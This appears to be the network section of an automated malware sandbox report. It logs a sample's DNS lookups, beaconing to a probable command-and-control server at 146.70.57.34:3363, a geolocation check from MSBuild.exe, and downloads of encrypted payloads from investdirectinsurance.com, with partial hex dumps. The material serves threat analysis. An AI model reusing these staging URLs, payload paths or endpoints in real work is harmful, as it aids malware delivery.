                                        Jul 27, 2024 11:40:57.221491098 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:57.228296995 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:58.188437939 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:58.189049959 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:58.200033903 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:59.225202084 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:40:59.225940943 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:40:59.233697891 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:00.224205017 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:00.224714041 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:00.235070944 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:01.229101896 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:01.240406990 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:01.245374918 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:02.248584032 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:02.249228001 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:02.260756969 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:03.257378101 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:03.260360003 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:03.265418053 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:04.265894890 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:04.270211935 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:04.275141954 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:05.276974916 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:05.278351068 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:05.283410072 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:06.288392067 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:06.288793087 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:06.293633938 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:07.300556898 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:07.301436901 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:07.306278944 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:08.308543921 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:08.309084892 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:08.313880920 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:09.320650101 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:09.321521997 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:09.326708078 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:10.332457066 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:10.337122917 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:10.341948986 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:11.468718052 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:11.469558954 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:11.474472046 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:12.349374056 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:12.350239992 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:12.355130911 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:13.369163036 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:13.369750977 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:13.375653028 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:14.384954929 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:14.385406971 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:14.390300989 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:15.393714905 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:15.397556067 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:15.402527094 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:16.397576094 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:16.398056984 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:16.403072119 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:17.512677908 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:17.513189077 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:17.519009113 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:18.425513029 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:18.427745104 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:41:18.432753086 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:19.441586971 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:41:19.483181000 CEST497163363192.168.2.6146.70.57.34
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 27, 2024 11:37:11.195600033 CEST5718453192.168.2.61.1.1.1
                                        Jul 27, 2024 11:37:11.223541975 CEST53571841.1.1.1192.168.2.6
                                        Jul 27, 2024 11:37:14.146745920 CEST5545553192.168.2.61.1.1.1
                                        Jul 27, 2024 11:37:14.190634012 CEST53554551.1.1.1192.168.2.6
                                        Jul 27, 2024 11:37:16.417515039 CEST5954953192.168.2.61.1.1.1
                                        Jul 27, 2024 11:37:16.425309896 CEST53595491.1.1.1192.168.2.6
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jul 27, 2024 11:37:11.195600033 CEST192.168.2.61.1.1.10x4bcfStandard query (0)investdirectinsurance.comA (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:37:14.146745920 CEST192.168.2.61.1.1.10x3ddcStandard query (0)bignight.netA (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:37:16.417515039 CEST192.168.2.61.1.1.10x4e2dStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jul 27, 2024 11:37:11.223541975 CEST1.1.1.1192.168.2.60x4bcfNo error (0)investdirectinsurance.com172.67.189.102A (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:37:11.223541975 CEST1.1.1.1192.168.2.60x4bcfNo error (0)investdirectinsurance.com104.21.65.79A (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:37:14.190634012 CEST1.1.1.1192.168.2.60x3ddcNo error (0)bignight.net146.70.57.34A (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:37:16.425309896 CEST1.1.1.1192.168.2.60x4e2dNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:37:29.316829920 CEST1.1.1.1192.168.2.60x86e2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                        Jul 27, 2024 11:37:29.316829920 CEST1.1.1.1192.168.2.60x86e2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:37:30.761508942 CEST1.1.1.1192.168.2.60x30edNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:37:30.761508942 CEST1.1.1.1192.168.2.60x30edNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:38:30.720221996 CEST1.1.1.1192.168.2.60xf208No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Jul 27, 2024 11:38:30.720221996 CEST1.1.1.1192.168.2.60xf208No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        • investdirectinsurance.com
                                        • geoplugin.net
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649718178.237.33.50803984C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        TimestampBytes transferredDirectionData
                                        Jul 27, 2024 11:37:16.436156988 CEST71OUTGET /json.gp HTTP/1.1
                                        Host: geoplugin.net
                                        Cache-Control: no-cache
                                        Jul 27, 2024 11:37:17.084238052 CEST1170INHTTP/1.1 200 OK
                                        date: Sat, 27 Jul 2024 09:37:16 GMT
                                        server: Apache
                                        content-length: 962
                                        content-type: application/json; charset=utf-8
                                        cache-control: public, max-age=300
                                        access-control-allow-origin: *
                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649714172.67.189.102443516C:\Users\user\Desktop\41DLTjkmOm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-27 09:37:12 UTC114OUTGET /assuence/litesolidCha/MangoDB.ytyp HTTP/1.1
                                        User-Agent: PARAM_CLASS_MIN
                                        Host: investdirectinsurance.com
                                        2024-07-27 09:37:12 UTC681INHTTP/1.1 200 OK
                                        Date: Sat, 27 Jul 2024 09:37:12 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 15872
                                        Connection: close
                                        etag: "3e00-66a183eb-30ee7;;;"
                                        last-modified: Wed, 24 Jul 2024 22:44:59 GMT
                                        accept-ranges: bytes
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BODQkhZoZ2PWhAUWGhWJOZb8Ezq079m0gryNJhl3zgdtRqJH9AsGIGKfCXlQ8%2FkA8C%2FFrgGNYiTWMf%2BszDrhX2D5xPCigoGANREZh3LMC1OBM3ydOPykxxaT1KrWDBI6P0okRCBjhkQ794e"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8a9ba6428be543dc-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-07-27 09:37:12 UTC688INData Raw: 4d 34 81 eb f9 26 90 8a 04 03 e7 7c 2a 75 15 d4 b8 82 1b 8e ba 0c ac 38 40 23 01 92 97 3c 86 48 00 c5 12 30 1c 4b 6f fe 00 57 80 25 35 25 0c 75 00 ab d3 e5 be d2 20 a5 00 e0 05 4a 2d 3d 31 27 0e f4 72 6b ea 52 ac d7 21 e7 58 ff 59 cf 53 f4 69 31 dd 76 6c 55 f5 70 61 6e cb bb 64 48 ec 84 74 2d 3b a0 75 c6 b5 dd 20 60 fc 84 61 22 58 fa 6d 32 81 2d 78 60 4a c6 24 06 e9 5f 0e 9f c8 9a 50 d4 db c5 97 6c d0 8d 6e 2c 7f 05 8b 90 9f 50 00 04 16 89 9e a1 d3 a1 0b aa d8 5c da ca 84 e1 00 53 0b 2e 1d 08 7e 42 4e 7d a7 f5 2a cf 4b a2 00 51 f3 29 d1 5e ab cb 00 20 60 2b c5 a5 b5 7d 04 4c 18 5d 3b 5f 09 36 06 86 bd 79 76 ba dc 0b 00 15 06 84 8a d4 56 42 00 55 23 b4 96 bc 2b 53 00 5e fd 1f 09 8a 7a ad 00 8e 2f 5c 08 9a 7f d9 00 2f 75 fc a1 9a 68 08 00 87 8e ee 6c 63 55
                                        Data Ascii: M4&|*u8@#<H0KoW%5%u J-=1'rkR!XYSi1vlUpandHt-;u `a"Xm2-x`J$_Pln,P\S.~BN}*KQ)^ `+}L];_6yvVBU#+S^z/\/uhlcU
                                        2024-07-27 09:37:12 UTC1369INData Raw: 00 c9 90 fc 3f 8e d5 b4 00 a6 63 a0 06 df c0 07 04 15 d2 1c 81 8d 7c 66 00 50 4a d3 b3 89 73 6c 00 0d bc ed bb f4 69 12 00 b0 0b a6 e5 00 7b de 0c 7e dc a4 07 8a 5a a7 73 34 6c aa 50 80 a3 42 28 cf b2 dd 6e d1 24 09 13 05 3d f0 6c d0 fe 8d 11 2c 63 24 68 a7 ec 2c 0a 60 cb 60 72 bf a7 e1 16 89 c6 3c c6 a1 18 f6 0b 48 06 38 83 91 1f 6d 00 57 c0 f9 65 22 dd e1 33 0b 9e 80 98 ce 81 2f 11 d5 89 86 eb 14 96 c0 09 93 04 3c ee 1d 70 4b 01 4d a8 87 74 4d a9 7b 28 d5 87 c4 c3 21 02 29 00 a7 f7 fc 72 c0 c2 b1 04 22 ff 12 c3 3a 77 4e 03 4c dd a8 a9 bc e3 6b 13 f6 bc b3 b0 f6 1c e1 11 81 9d 1b 86 02 14 0b 00 50 25 a5 98 0c fd b9 04 54 6d f8 c5 47 62 71 00 95 cf 6f 63 7c 8d e1 00 3f af 4a b0 14 1e 7a 00 bc 83 b0 84 0c c1 43 11 18 a1 69 78 6d fc e6 06 87 c1 fe 32 92 4e
                                        Data Ascii: ?c|fPJsli{~Zs4lPB(n$=l,c$h,``r<H8mWe"3/<pKMtM{(!)r":wNLkP%TmGbqoc|?JzCixm2N
                                        2024-07-27 09:37:12 UTC1369INData Raw: 26 db c4 c2 61 b3 f3 1f 99 00 4c 8a 05 a9 d5 0a dc 36 18 f1 98 5d e1 13 72 5d d9 ac b3 13 b4 05 7c 44 a3 a9 70 38 b8 20 f7 01 be 9a 40 0f 2c 28 0e 22 51 8a 91 fc 69 00 3b 37 e2 4d 8e 8e 67 1a 35 f4 87 6e eb 13 f0 0b 55 cd c8 b4 ff 0b f3 52 93 ae e2 c3 c3 8d 05 00 59 0e b2 a1 85 b8 c3 00 93 c1 a1 68 f2 b4 4d 13 81 87 d4 bb 2f 80 42 03 bd 61 e9 c5 dd aa dd 28 81 f2 e1 6f 47 af a7 91 d9 dd e4 f8 f5 54 5b 58 00 ac 10 28 e0 1f b0 1f 58 6f 62 9c bc 74 da 0a 9d fe 95 71 d1 4a 8c 13 21 93 94 fc 07 e8 95 02 ef 3e 8f ff 21 c4 95 00 8e 20 03 6b 05 c2 21 00 d3 9e d4 4c 3d e4 f1 06 ac 1e 17 e7 1f f0 bd 02 fa 8c d4 f7 4f 77 c3 2b fc 7d 36 25 57 8e be 11 22 98 dc 78 84 08 13 00 b4 86 25 fb 86 93 f6 3b e7 d4 67 d9 13 15 6c 2a 19 ec 13 40 d6 bb 45 28 d6 24 e7 81 d2 3d bc
                                        Data Ascii: &aL6]r]|Dp8 @,("Qi;7Mg5nURYhM/Ba(oGT[X(XobtqJ!>! k!L=Ow+}6%W"x%;gl*@E($=
                                        2024-07-27 09:37:12 UTC1369INData Raw: e0 ae 9c 4e 17 1c 59 20 9b da b7 ea 23 36 59 ff 10 56 61 c2 b5 3d 1a c5 6f 7e 42 1a 43 cc 08 3a 39 53 9f 09 22 f1 13 74 4f 91 0f 46 dd 18 08 48 a9 27 4a 8d 3e 21 22 a2 0e 05 93 d8 6c 1a 2a 97 cb e9 98 02 2f f7 00 f7 ef 84 e8 2b e2 e3 04 b3 a6 75 95 ed 23 1f 00 3b 83 a7 55 fe 67 b7 2e 49 d3 5c ca f5 40 93 00 69 87 5d d0 40 36 3e 22 33 4b 21 14 1b f6 39 2a 56 1e d4 68 a5 8c b5 5e 41 02 fc 37 b3 35 84 00 c8 19 eb 59 3b 45 27 1f 8a 7c 87 d7 8e df 1c 5e be 17 0c 0f 66 3f ce 00 6c 14 05 ea 2f f5 db 1f 12 2c cc fc 5b f6 59 5e f5 18 11 80 0c cb e4 00 e7 3b f1 9e 58 ca 5e 1f be e0 c7 47 69 85 eb 5e 79 77 c6 e1 2c b4 2d 00 2b 2b 35 e1 de 44 75 1f 4d 81 17 6b 65 19 7b 5e f4 a6 88 83 60 7f d1 00 34 68 c7 9d db f6 f0 1f fc 36 9c 27 fa 50 62 5e 0c e7 b2 27 ab 9f 27 00
                                        Data Ascii: NY #6YVa=o~BC:9S"tOFH'J>!"l*/+u#;Ug.I\@i]@6>"3K!9*Vh^A75Y;E'|^f?l/,[Y^;X^Gi^yw,-++5DuMke{^`4h6'Pb^''
                                        2024-07-27 09:37:12 UTC1369INData Raw: 5b 29 42 e3 3c 68 f5 0d cf ca 0c 6e 66 73 0f d8 e1 56 31 61 20 2e 6d 6e f5 57 02 b3 0b 6c ca 40 84 e9 24 db 3a 75 13 d3 33 09 b5 c1 1f 75 9c e2 6d 89 e5 a3 ad 74 78 77 ed f1 f2 cc 2d 6c cc 8f 51 77 3b 20 c3 76 7f a4 66 9c ec cc d4 32 4d 61 0d 4c c8 65 d0 20 cb ea c6 e1 cf 81 91 3d a4 16 8d bf fd 9a a6 2c 46 4c 14 da 3c 73 6e 6b c3 b5 42 36 c2 98 91 3d 3e c7 f7 ef 85 ca ac 71 c9 8a 51 6f 4c a8 ae 6f 78 20 65 81 97 dd 3b 2e 47 45 d6 c4 47 a9 48 75 7e 98 82 7f 81 ea b3 72 b4 a9 53 f8 dd e8 62 6c 91 63 63 f0 02 6b c0 6b b8 39 0b f6 6c a2 1a 67 b0 47 bd a2 61 47 6f 72 99 45 0c 73 af 05 5d 30 71 32 9d c6 65 ac 9d 75 f2 2b 80 df d0 14 62 65 72 1e 30 c6 f4 1d 54 70 ce 7f 02 aa 9a d8 6b 79 39 cb 08 2d 29 73 0d 75 35 d2 2f 50 6d 6f d4 20 54 6f 06 24 f5 e8 9a 3d f7
                                        Data Ascii: [)B<hnfsV1a .mnWl@$:u3umtxw-lQw; vf2MaLe =,FL<snkB6=>qQoLox e;.GEGHu~rSblcckk9lgGaGorEs]0q2eu+ber0Tpky9-)su5/Pmo To$=
                                        2024-07-27 09:37:12 UTC1369INData Raw: 00 9b de 0e ba e3 33 b4 6c 17 fa 95 48 2f af 5c 2b 10 89 fa 01 ad 19 fa b6 c3 a5 7b 0c 00 b5 75 a7 06 3f 64 2e 64 c7 dc a9 5b 3e 47 00 9e 61 ea 6a 3c 33 cb 3c 09 8b d1 74 ac c6 84 a8 c8 4e be 5e 99 dd fc 23 76 9a 22 73 11 a2 8e 00 a3 ff 33 2a 6f 4b b2 04 a9 bd e7 c0 d6 f1 76 1a 58 55 ca 2b f2 7f 74 23 92 20 66 46 e8 11 0c 2a f1 4b 36 79 16 4e 1f 23 d1 67 a7 ea 4c e3 f6 00 7f 60 97 43 33 31 d0 57 ca 13 50 8f 80 0f 93 00 af bb 02 cf 2e 28 7e 01 e8 09 12 21 6d e3 0d 14 8c 6c 2a 0b ee 06 2d 6a 4a 1f ea 65 8f e0 50 30 69 a1 d2 2d ad f6 d6 10 a9 d2 2d 81 13 0c eb 03 2d 12 52 de e8 73 0c 01 e6 a1 63 71 66 b7 ab 02 ee 4c d8 dd 57 e7 67 01 56 43 ac 2a 37 6b 89 0f 96 82 fe ff 8b 30 d7 0c 0e d9 c6 25 d7 fe cc 00 3c c7 54 d1 00 55 bc 00 d5 94 d8 a1 fe 3e 75 06 26 e7
                                        Data Ascii: 3lH/\+{u?d.d[>Gaj<3<tN^#v"s3*oKvXU+t# fF*K6yN#gL`C31WP.(~!ml*-jJeP0i---RscqfLWgVC*7k0%<TU>u&
                                        2024-07-27 09:37:12 UTC1369INData Raw: 4d 5f e0 8e ec ce 3e fa 22 1c 0c 00 4d ec 2c 48 dd 5a 50 01 6c e9 9e ba 91 fb 92 91 8d 64 22 e9 ca 3a 81 78 64 b0 1e 8c 61 88 6b 97 28 19 7c ef 18 73 f4 00 c4 cc 2f 45 b3 f4 42 8e 49 0c e5 e6 d9 37 b7 00 c6 59 c8 e6 4b fc 4a 01 71 8d e3 38 9d c6 bc 91 b7 7d 51 37 3d 9e 73 58 e2 ac f8 99 2c 45 49 a6 27 64 d3 a8 b5 5d c2 00 ee 8e 01 44 f5 ef 5e 8e 62 87 2c 28 29 24 88 00 1b bf 42 d8 28 55 86 01 ff 1f 5a 2f 3e 77 63 91 52 23 30 aa 73 07 f5 00 ce 8b 46 93 f6 17 c7 b8 95 33 b6 1f bd d1 42 00 27 17 b1 3a 8d 5e 09 d9 01 a3 4c 0f 12 ba f1 00 79 75 a8 c0 e4 0a d4 04 67 68 4c 53 7f 84 30 91 3a f2 2d 2e e2 3a 35 34 72 7b 39 4d c3 f6 e2 26 f9 cc c4 0c 89 13 3e 00 c2 18 1b 6c bd 57 f8 42 5e d9 8a 71 61 bc 6e 00 02 e2 84 5d e4 c4 f3 04 bc 94 36 16 a0 3f 91 91 f7 65 4d
                                        Data Ascii: M_>"M,HZPld":xdak(|s/EBI7YKJq8}Q7=sX,EI'd]D^b,()$B(UZ/>wcR#0sF3B':^LyughLS0:-.:54r{9M&>lWB^qan]6?eM
                                        2024-07-27 09:37:12 UTC1369INData Raw: 43 fe 23 29 ef 17 1c e6 ce 21 00 24 37 18 f4 5a 35 89 03 58 db 15 4a 24 7f 39 d6 5d d7 72 ea fb 0f 46 00 52 54 94 44 57 81 4e 07 ac c2 4f 90 69 26 5a 17 3d 46 68 e7 b0 15 dd 00 f0 58 f4 61 4a de f1 0b 4a db 5c 3d 7f 65 50 be 5c 9c 78 a3 12 12 e9 00 8c 55 b4 f0 74 9d 1a 03 42 72 90 24 27 f2 fd cf 6c 12 a1 8f b0 5a 9f 00 11 b6 66 49 c2 c7 02 02 15 9b 79 e6 f4 53 1e 82 77 f9 49 e0 56 b9 16 00 e1 c6 35 06 66 bc be 01 ad fe 66 d4 d5 0f 9a f9 58 43 15 94 f3 17 c0 00 d1 e7 25 45 8c 6e 65 03 e1 cc d1 08 81 46 e8 be 65 33 90 c4 19 f0 22 00 c4 1b 77 54 de d7 62 02 75 2a 5a 14 ae de 6f cf 5b e1 98 8c 96 68 ed 00 a1 d6 d6 50 b9 dc d7 04 cb d5 45 e7 31 54 85 4b 6f 99 3f 53 77 5d cc 00 c0 db 8a 99 75 f6 dc 01 2b 71 19 e7 ee 1f 6e f9 66 8c af 8b 7b 43 89 00 48 ef f8 35
                                        Data Ascii: C#)!$7Z5XJ$9]rFRTDWNOi&Z=FhXaJJ\=eP\xUtBr$'lZfIySwIV5ffXC%EneFe3"wTbu*Zo[hPE1TKo?Sw]u+qnf{CH5
                                        2024-07-27 09:37:12 UTC1369INData Raw: fb 00 00 4a 91 00 eb 1a 16 3e f9 b3 a6 6f cd a3 a7 74 89 89 5d 76 af 57 c5 65 ec e7 c4 a1 93 9a 6d 44 c8 55 1d df 70 b9 da 00 6c 57 07 96 c1 03 24 6d 8f d2 99 97 f9 1b 65 62 b6 c0 7b 15 68 f9 a4 64 e1 d5 36 ee 15 e5 7c 4e 0b 23 91 00 e3 fb 0a 4f 1e 17 c3 7e 02 63 ef 5a df 9f 8d 5a 06 45 b8 5a 96 b5 9f b9 6b d6 bc 00 fb c7 23 d6 ac 6e 25 31 08 72 9f 35 81 9a c0 39 9d cb 85 40 be 13 c0 61 63 f3 3c d5 b2 2b f3 45 8f 73 6b 19 8a 95 6b 61 9d 4e c6 2a 73 d6 66 66 82 5a 9b d6 35 2c ef 34 f0 67 e6 93 15 cf 75 38 9d ba ce 34 25 3d 23 00 a9 a7 0c 09 20 99 27 63 ef 15 94 89 ed 0d 60 70 dd 08 8c 76 4c ff 16 47 9c 0f f6 6a 3a af ae 71 25 7b 3c bf 1a 07 81 31 39 7f 35 6d 3e 1d cb 49 3b 30 de 52 a6 a7 cb 4a 7d 63 9e d2 1d dd b1 39 85 6d 9c ee ee b6 85 6f a9 d8 61 0f 66
                                        Data Ascii: J>ot]vWemDUplW$meb{hd6|N#O~cZZEZk#n%1r59@ac<+EskkaN*sffZ5,4gu84%=# 'c`pvLGj:q%{<195m>I;0RJ}c9moaf
                                        2024-07-27 09:37:12 UTC1369INData Raw: 77 af e6 95 5b d9 b1 e4 6e 8d 5e 02 33 80 a5 31 45 7c 73 ee 43 df 12 4c 65 bf 15 a8 65 45 27 9c 61 9a 37 d6 2a b0 32 3d 69 bd e6 3f 00 c2 c0 8e 00 27 b2 79 e7 e5 71 5f 46 c1 d9 14 4f 0a 12 43 6f be ce 21 ae ee a5 74 6e 0f ca 3c 03 4a 91 7e 41 fe 61 e8 f5 db 23 fc 67 56 f0 32 9d ff 61 37 69 11 19 6f 14 ad 96 5a 00 28 08 40 12 f3 94 08 72 dc cf 58 51 94 13 3b 75 8f 1f a1 4a 9c 8e 62 67 9c 9a bb 1c 18 5d bd 74 f6 bd 03 40 83 9d db 69 bf 70 ef 3d ad cc 0e 55 76 b0 9a 51 d8 8c 4a 67 a8 ed 1a a9 44 06 88 00 0f c6 96 06 f0 44 32 73 c8 33 a7 5a 9d c2 de 65 54 84 43 15 3a 78 99 46 d6 a7 4a 93 0d 1c 00 50 ba 81 f0 c5 54 05 c5 47 a4 9e e7 8e a0 8a 41 74 92 db c7 8c ec 42 b9 6d b3 66 2e a1 33 60 f2 50 11 18 4f 56 b0 f3 5a 65 7c 4c 19 cc be b2 b1 72 1c c7 6f b6 0c ee
                                        Data Ascii: w[n^31E|sCLeeE'a7*2=i?'yq_FOCo!tn<J~Aa#gV2a7ioZ(@rXQ;uJbg]t@ip=UvQJgDD2s3ZeTC:xFJPTGAtBmf.3`POVZe|Lro


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.649715172.67.189.102443516C:\Users\user\Desktop\41DLTjkmOm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-27 09:37:13 UTC115OUTGET /assuence/litesolidCha/Paatapas.ytyp HTTP/1.1
                                        User-Agent: PARAM_CLASS_MIN
                                        Host: investdirectinsurance.com
                                        2024-07-27 09:37:13 UTC689INHTTP/1.1 200 OK
                                        Date: Sat, 27 Jul 2024 09:37:13 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 494592
                                        Connection: close
                                        etag: "78c00-66a24b54-30faf;;;"
                                        last-modified: Thu, 25 Jul 2024 12:55:48 GMT
                                        accept-ranges: bytes
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uE54mwZ0nS%2FS3Mim4AOF6XgkjvpVR2TI0OOp8by6%2BC%2BW78ykfhuglsMgRrXi3oThUdidSsmM2VZF4Q27s%2FBDzschu%2F0PRTuGTUuDI%2F7oUT0skymRaf2qesM22eY2UXr%2FX2cvJXC8Db9Ozi21"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8a9ba648be9e7d24-EWR
                                        alt-svc: h3=":443"; ma=86400
